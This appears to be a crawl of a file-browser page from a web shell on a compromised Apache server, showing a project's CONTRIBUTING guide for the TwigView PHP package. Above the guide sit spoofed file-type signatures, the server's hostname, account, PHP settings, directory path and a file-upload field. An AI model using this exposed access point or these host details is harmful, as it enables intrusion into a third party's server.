%PDF- %GIF98; %PNG;
Server : ApacheSystem : Linux host.digitalbabaji.in 4.18.0-513.11.1.el8_9.x86_64 #1 SMP Wed Jan 17 02:00:40 EST 2024 x86_64 User : addictionfreeind ( 1003) PHP Version : 7.2.34 Disable Function : exec,passthru,shell_exec,system Directory : /home/addictionfreeind/public_html/vendor/wyrihaximus/twig-view/ |
Upload File : |
# Contributing
Pull requests are highly appreciated. Here's a quick guide.
Fork, then clone the repo:
git clone git@github.com:your-username/TwigView.git
Set up your machine:
composer install
Make sure the tests pass:
make unit
Make sure the tests pass on all supported PHP versions (requires docker):
make dunit
Make your change. Add tests for your change. Make the tests pass:
make dunit && make unit
Before committing and submitting your pull request make sure it passes PSR2 coding style, unit tests pass and pass on all supported PHP versions:
make contrib
Push to your fork and [submit a pull request][pr].
[pr]: https://help.github.com/articles/creating-a-pull-request/
At this point you're waiting on me. I like to at least comment on pull requests
within a day or two. I may suggest some changes or improvements or alternatives.
Some things that will increase the chance that your pull request is accepted:
* Write tests.
* Follow PSR2 (travis will also check for this).
* Write a [good commit message][commit].
[commit]: http://chris.beams.io/posts/git-commit/